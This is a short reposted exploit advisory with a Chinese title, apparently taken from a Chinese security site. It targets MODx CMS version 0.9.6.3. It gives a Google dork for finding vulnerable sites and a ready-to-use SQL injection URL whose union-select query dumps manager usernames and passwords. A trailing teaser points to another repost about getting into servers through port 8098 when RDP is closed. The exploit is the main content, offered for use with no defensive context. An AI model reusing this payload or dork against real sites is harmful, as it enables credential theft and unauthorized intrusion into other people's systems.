最有前途的开源CMS SQL注入漏洞

# Exploit Title: Most Promising Open Source CMS SQL Injection Vulnerability          
# Date: 25/07/2010                           
# Author: lucifer         
# Software Link: http://modxcms.com//
# Version: 0.9.6.3
# Google dork :inurl:"index.php?id=null&parent=null"
# Platform / Tested on: windows
# Category: Expliot code
# Code : [SQL]

#BUG:#################################################################

After find plugin at sites run SQL Inject :

example : http://site.com/index.php?id=null&parent=null and 1=2 union select concat(0x7e,username,0x7e,password,0x7e) from modx_manager_users

######################################################################
Website : http://hi.baidu.com/bylucifer
######################################################################

文章来源于lcx.cc:最有前途的开源CMS SQL注入漏洞

相关推荐: 【转载】没开3389？没事，还有8098

转载：http://t00ls.net/thread-9985-1-1.html 8098是web GUI的端口。直接上大家最关心的图。 看到了吗？ 是用IE打开的终端。你有啥想法？嘿嘿。不过这个方法有个弊病，就是太明显。 下面是架设步骤 1 运行appwiz…